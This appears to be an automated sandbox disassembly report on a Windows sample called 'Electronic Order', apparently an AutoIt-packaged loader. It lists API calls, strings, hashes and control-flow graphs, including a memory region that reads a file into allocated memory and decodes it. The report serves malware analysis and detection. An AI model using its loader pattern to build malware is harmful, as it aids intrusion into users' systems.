                                      • Opcode ID: 14878318f2ff5975c83649b62c9123c7ece9b7beee439522ee2755f27f3ffab2
                                      • Instruction ID: c6780ea8f2af4f05a52e4fcd35973e67f55b52cd2c9b80e57576b6c20d38bb20
                                      • Opcode Fuzzy Hash: 14878318f2ff5975c83649b62c9123c7ece9b7beee439522ee2755f27f3ffab2
                                      • Instruction Fuzzy Hash: 0BE0D8754104109F42106738FC4D8EA775C9F07739F100715F935E10F0E7B059548599
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DD0BBB
                                      • timeGetTime.WINMM ref: 00DD0E76
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DD0FB3
                                      • TranslateMessage.USER32(?), ref: 00DD0FC7
                                      • DispatchMessageW.USER32(?), ref: 00DD0FD5
                                      • Sleep.KERNEL32(0000000A), ref: 00DD0FDF
                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00DD105A
                                      • DestroyWindow.USER32 ref: 00DD1066
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DD1080
                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00E052AD
                                      • TranslateMessage.USER32(?), ref: 00E0608A
                                      • DispatchMessageW.USER32(?), ref: 00E06098
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E060AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pr$pr$pr$pr
                                      • API String ID: 4003667617-1825247661
                                      • Opcode ID: 529e246f035edab07dfadccf36ef3498d8779615433f532336d7cc2433d907d0
                                      • Instruction ID: af32d52e9cd4074d969b5482bbceaf1fedda42d64a40214ee2dde5b2d7982053
                                      • Opcode Fuzzy Hash: 529e246f035edab07dfadccf36ef3498d8779615433f532336d7cc2433d907d0
                                      • Instruction Fuzzy Hash: F5B29271608741DFD724DF24C884BAABBE5FF84304F14491EE499A72A1DB71E885CFA2
                                      Control-flow Graph (graph image not captured)
                                      APIs
                                        • Part of subcall function 00E291E9: __time64.LIBCMT ref: 00E291F3
                                        • Part of subcall function 00DC5045: _fseek.LIBCMT ref: 00DC505D
                                      • __wsplitpath.LIBCMT ref: 00E294BE
                                        • Part of subcall function 00DE432E: __wsplitpath_helper.LIBCMT ref: 00DE436E
                                      • _wcscpy.LIBCMT ref: 00E294D1
                                      • _wcscat.LIBCMT ref: 00E294E4
                                      • __wsplitpath.LIBCMT ref: 00E29509
                                      • _wcscat.LIBCMT ref: 00E2951F
                                      • _wcscat.LIBCMT ref: 00E29532
                                        • Part of subcall function 00E2922F: _memmove.LIBCMT ref: 00E29268
                                        • Part of subcall function 00E2922F: _memmove.LIBCMT ref: 00E29277
                                      • _wcscmp.LIBCMT ref: 00E29479
                                        • Part of subcall function 00E299BE: _wcscmp.LIBCMT ref: 00E29AAE
                                        • Part of subcall function 00E299BE: _wcscmp.LIBCMT ref: 00E29AC1
                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E296DC
                                      • _wcsncpy.LIBCMT ref: 00E2974F
                                      • DeleteFileW.KERNEL32(?,?), ref: 00E29785
                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E2979B
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E297AC
                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E297BE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                      • String ID:
                                      • API String ID: 1500180987-0
                                      • Opcode ID: cdab09c2208ee04cb17a4b8a96b85b340d6de05313a3714c413964cd875c93f7
                                      • Instruction ID: a809506919b33d94b80f6016d6f97d42d3baa2b16f5a0699199fd890ec549ecd
                                      • Opcode Fuzzy Hash: cdab09c2208ee04cb17a4b8a96b85b340d6de05313a3714c413964cd875c93f7
                                      • Instruction Fuzzy Hash: 37C128B1D00229AADF21DF95DC85EDEB7BDEF45300F0050AAE609E7152DB70AA848F65
                                      Control-flow Graph (graph image not captured)
                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00DC3074
                                      • RegisterClassExW.USER32(00000030), ref: 00DC309E
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DC30AF
                                      • InitCommonControlsEx.COMCTL32(?), ref: 00DC30CC
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DC30DC
                                      • LoadIconW.USER32(000000A9), ref: 00DC30F2
                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DC3101
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: 398a91169e5ca14a457bd054b6efa2361307d280f5ebe5c2d130fce243548d6f
                                      • Instruction ID: 68ba6880344f915ce7e4dfd4f769b8eb8d0cece7a24163cbc5f58ae67181c743
                                      • Opcode Fuzzy Hash: 398a91169e5ca14a457bd054b6efa2361307d280f5ebe5c2d130fce243548d6f
                                      • Instruction Fuzzy Hash: F33156B5840309EFDB00CFA5E889AD9BBF4FB0A710F10416AE544B62A0D3B90549CF51
                                      Control-flow Graph (graph image not captured)
                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00DC3074
                                      • RegisterClassExW.USER32(00000030), ref: 00DC309E
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DC30AF
                                      • InitCommonControlsEx.COMCTL32(?), ref: 00DC30CC
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DC30DC
                                      • LoadIconW.USER32(000000A9), ref: 00DC30F2
                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DC3101
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: e42b59eb80f0fc4bd4917bb69b59370fa1ab435fed9a19e8b9b0646f79e80601
                                      • Instruction ID: b5e48c5830c10c657d976c7a41f10a488d217f028cd682f4658a26d1a29b6a1e
                                      • Opcode Fuzzy Hash: e42b59eb80f0fc4bd4917bb69b59370fa1ab435fed9a19e8b9b0646f79e80601
                                      • Instruction Fuzzy Hash: FA21C5B5D50218AFDB00DFA6E849B9DBBF4FB09B00F00412AF518B62A0D7B545498F95
                                      Control-flow Graph (graph image not captured)
                                      APIs
                                        • Part of subcall function 00DC4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E862F8,?,00DC37C0,?), ref: 00DC4882
                                        • Part of subcall function 00DE074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00DC72C5), ref: 00DE0771
                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00DC7308
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00DFECF1
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00DFED32
                                      • RegCloseKey.ADVAPI32(?), ref: 00DFED70
                                      • _wcscat.LIBCMT ref: 00DFEDC9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                      • API String ID: 2673923337-2727554177
                                      • Opcode ID: 0a3f143a295c607642521f26b17a67fe10526acb25f254e7e4acc673f6eaf619
                                      • Instruction ID: 92fc7a0bcc9e0838285bf3c950ce1a59845d90fa2873b193eca6831964031e9b
                                      • Opcode Fuzzy Hash: 0a3f143a295c607642521f26b17a67fe10526acb25f254e7e4acc673f6eaf619
                                      • Instruction Fuzzy Hash: 7A717CB14083069EC314EF66EC8196BBBE8FF95750B54492EF589A31B0DB30D948CB71
                                      Control-flow Graph (graph image not captured; legend: Executed / Not Executed; block and edge listing follows)
                                      control_flow_graph 760 dc3633-dc3681 762 dc36e1-dc36e3 760->762 763 dc3683-dc3686 760->763 762->763 764 dc36e5 762->764 765 dc3688-dc368f 763->765 766 dc36e7 763->766 767 dc36ca-dc36d2 DefWindowProcW 764->767 770 dc375d-dc3765 PostQuitMessage 765->770 771 dc3695-dc369a 765->771 768 dc36ed-dc36f0 766->768 769 dfd31c-dfd34a call dd11d0 call dd11f3 766->769 778 dc36d8-dc36de 767->778 773 dc3715-dc373c SetTimer RegisterWindowMessageW 768->773 774 dc36f2-dc36f3 768->774 807 dfd34f-dfd356 769->807 772 dc3711-dc3713 770->772 775 dfd38f-dfd3a3 call e22a16 771->775 776 dc36a0-dc36a2 771->776 772->778 773->772 781 dc373e-dc3749 CreatePopupMenu 773->781 779 dfd2bf-dfd2c2 774->779 780 dc36f9-dc370c KillTimer call dc44cb call dc3114 774->780 775->772 801 dfd3a9 775->801 782 dc36a8-dc36ad 776->782 783 dc3767-dc3776 call dc4531 776->783 787 dfd2f8-dfd317 MoveWindow 779->787 788 dfd2c4-dfd2c6 779->788 780->772 781->772 790 dfd374-dfd37b 782->790 791 dc36b3-dc36b8 782->791 783->772 787->772 795 dfd2c8-dfd2cb 788->795 796 dfd2e7-dfd2f3 SetFocus 788->796 790->767 798 dfd381-dfd38a call e1817e 790->798 799 dc36be-dc36c4 791->799 800 dc374b-dc375b call dc45df 791->800 795->799 803 dfd2d1-dfd2e2 call dd11d0 795->803 796->772 798->767 799->767 799->807 800->772 801->767 803->772 807->767 808 dfd35c-dfd36f call dc44cb call dc43db 807->808 808->767
                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00DC36D2
                                      • KillTimer.USER32(?,00000001), ref: 00DC36FC
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DC371F
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DC372A
                                      • CreatePopupMenu.USER32 ref: 00DC373E
                                      • PostQuitMessage.USER32(00000000), ref: 00DC375F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                      • String ID: TaskbarCreated$%
                                      • API String ID: 129472671-3835587964
                                      • Opcode ID: 60f6ebf4a2f2585f8c19b41cff916d84c30f8700876925d65ef882a23ecce795
                                      • Instruction ID: 840ee1ca10c2b5564e976ca2b15bf5481b8fe8032cce1cd5b818b0f2f2280ade
                                      • Opcode Fuzzy Hash: 60f6ebf4a2f2585f8c19b41cff916d84c30f8700876925d65ef882a23ecce795
                                      • Instruction Fuzzy Hash: 044116B2254107BFDF146F68EC0AF793755EB41300F18812DF64AA72E1CA64DE1597B1
                                      Control-flow Graph (graph image not captured)
                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00DC3A62
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00DC3A71
                                      • LoadIconW.USER32(00000063), ref: 00DC3A88
                                      • LoadIconW.USER32(000000A4), ref: 00DC3A9A
                                      • LoadIconW.USER32(000000A2), ref: 00DC3AAC
                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DC3AD2
                                      • RegisterClassExW.USER32(?), ref: 00DC3B28
                                        • Part of subcall function 00DC3041: GetSysColorBrush.USER32(0000000F), ref: 00DC3074
                                        • Part of subcall function 00DC3041: RegisterClassExW.USER32(00000030), ref: 00DC309E
                                        • Part of subcall function 00DC3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DC30AF
                                        • Part of subcall function 00DC3041: InitCommonControlsEx.COMCTL32(?), ref: 00DC30CC
                                        • Part of subcall function 00DC3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DC30DC
                                        • Part of subcall function 00DC3041: LoadIconW.USER32(000000A9), ref: 00DC30F2
                                        • Part of subcall function 00DC3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DC3101
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 423443420-4155596026
                                      • Opcode ID: f8b25ca4da5d195f162d97417f12e905be1b56d88b226927a8b9878624e79fab
                                      • Instruction ID: edfe9a4524f8031ad3f375fba8a086c2c4949b9303446dbb0833f9dd1f18d40f
                                      • Opcode Fuzzy Hash: f8b25ca4da5d195f162d97417f12e905be1b56d88b226927a8b9878624e79fab
                                      • Instruction Fuzzy Hash: 4F214B75950308AFEB109FA6EC09B9D7BB5FB08710F00416AF508BB2B0D3BA56589F94
                                      Control-flow Graph (graph image not captured)
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$b
                                      • API String ID: 1825951767-3834736419
                                      • Opcode ID: 613f64c75d2d9b0951f48c5180803bc800665f2d7d5c25a2cf752f29c73ba445
                                      • Instruction ID: def6e43e59b05d1f29397f46423d0d8cb58f4064f9a7872276a3afc1b99f6451
                                      • Opcode Fuzzy Hash: 613f64c75d2d9b0951f48c5180803bc800665f2d7d5c25a2cf752f29c73ba445
                                      • Instruction Fuzzy Hash: 06A14A7191022A9ACB05EBA1DC96EEEB7B9FF14300F14452DF416B7191DF74AA09CB70

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00DE03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DE03D3
                                        • Part of subcall function 00DE03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00DE03DB
                                        • Part of subcall function 00DE03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DE03E6
                                        • Part of subcall function 00DE03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DE03F1
                                        • Part of subcall function 00DE03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00DE03F9
                                        • Part of subcall function 00DE03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00DE0401
                                        • Part of subcall function 00DD6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00DCFA90), ref: 00DD62B4
                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DCFB2D
                                      • OleInitialize.OLE32(00000000), ref: 00DCFBAA
                                      • CloseHandle.KERNEL32(00000000), ref: 00E049F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                      • String ID: <g$\d$%$c
                                      • API String ID: 1986988660-619945097
                                      • Opcode ID: cd676ded48a0ee1862973d4d83b829e631adad6f78891d22675e056720430486
                                      • Instruction ID: f655133ecbd0f9a10ee078ac50f0019e207704e7766ec758fd7e2ae6f923aff4
                                      • Opcode Fuzzy Hash: cd676ded48a0ee1862973d4d83b829e631adad6f78891d22675e056720430486
                                      • Instruction Fuzzy Hash: 718187B09012508FC784EF7BA9556197BF5FB98708B10952AE42DFB272EB36440D8F61

                                      Control-flow Graph

                                      Control-flow graph 983, blocks 01582610-01582912 (edge list condensed; calls in graph order):
                                      • 1582610-15826be: call 1580000
                                      • 15826c5-15826eb: call 1583520, CreateFileW
                                      • 1582709-1582723: VirtualAlloc
                                      • 158272a-1582741: ReadFile
                                      • 1582748-1582788: VirtualAlloc
                                      • 158278f-15827aa: call 1583770, then a loop over 15827b5-15827f0 that repeats call 1583770
                                      • 15827f2-1582806: call 1583580
                                      • 1582810-1582814: FindCloseChangeNotification (in KERNELBASE this export shares its code with CloseHandle, so this is most likely the close of the handle returned by CreateFileW)
                                      • 1582820-158282b: VirtualFree
                                      • 158282e-1582837: loops back to 15826c5 or leaves via 158283d
                                      • 15828fc-1582907: VirtualFree
                                      Every failed check (15826ed, 1582704, 1582725, 1582743, 158278a, 1582808) jumps to the exit path at 158283d.
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015826E1
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01582907
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CreateFileFreeVirtual
                                      • String ID:
                                      • API String ID: 204039940-0
                                      • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                      • Instruction ID: 18095a84c19eb8f29cb7a23407b9a64dc356ebcbf243ff1007ccd3e35b3be850
                                      • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                      • Instruction Fuzzy Hash: F0A1F674E00209EBDF14EFA4C898BAEBBB5FF48304F208559E605BB280D7759A41CF95

                                      Control-flow Graph

                                      Control-flow graph 1114, single block 00DC39E7-00DC3A57: CreateWindowExW * 2, ShowWindow * 2
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DC3A15
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DC3A36
                                      • ShowWindow.USER32(00000000,?,?), ref: 00DC3A4A
                                      • ShowWindow.USER32(00000000,?,?), ref: 00DC3A53
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: e5b09fd313be7be75bf9ed2c0e3205f7c64fb3cfca67b2306bc9e5314ef149a5
                                      • Instruction ID: b681298598724a4a21520114c2e934d9de00abff1eb79439152c6f1925127dee
                                      • Opcode Fuzzy Hash: e5b09fd313be7be75bf9ed2c0e3205f7c64fb3cfca67b2306bc9e5314ef149a5
                                      • Instruction Fuzzy Hash: 2EF03A706802907EEA3017237C0DF273E7DD7C7F51B01006AF908B6170C2A51805DBB0

                                      Control-flow Graph

                                      Control-flow graph 1115, blocks 015823B0-015825C3 (edge list condensed; calls in graph order):
                                      • 15823b0-1582507: call 1580000, call 15822a0, CreateFileW
                                      • 1582525-158253f: VirtualAlloc
                                      • 1582543-158255a: ReadFile
                                      • 158255e-1582598: call 15822e0, call 15812a0
                                      • 158259a-15825af: call 1582330 (conditional)
                                      • 15825b4-15825bc: ExitProcess
                                      Every failed check (1582509, 1582520, 1582541, 158255c) jumps to the exit path at 15825be-15825c3.
                                      APIs
                                        • Part of subcall function 015822A0: Sleep.KERNELBASE(000001F4), ref: 015822B1
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015824FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CreateFileSleep
                                      • String ID: DONBL4C73AXMVYX04A
                                      • API String ID: 2694422964-1570699908
                                      • Opcode ID: 0a7c3924eb397a78bbfaf2b8ec4d0615e911b16ad56c6c72b437803fa971cb3c
                                      • Instruction ID: eeadbb7aee36574f8809c64042c82791c0e481a535654e1bc9493512dc489552
                                      • Opcode Fuzzy Hash: 0a7c3924eb397a78bbfaf2b8ec4d0615e911b16ad56c6c72b437803fa971cb3c
                                      • Instruction Fuzzy Hash: 27519370E14249DBEF11DBE4C854BEEBBB5AF58300F004199E609BB2C1D7BA0B45CB65

                                      Control-flow Graph

                                      Control-flow graph 1139, blocks 00DE564D-00DE5810 (edge list condensed): internal calls only, to de8d68, de8ff6, de3020, df0df7, df0f18, de4916 and df10ab; no Win32 imports appear in this graph.
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                      • String ID:
                                      • API String ID: 1559183368-0
                                      • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                      • Instruction ID: 0a920b27627c971385a35a90acd34806e44fb193a60d8cdc901edec887123f54
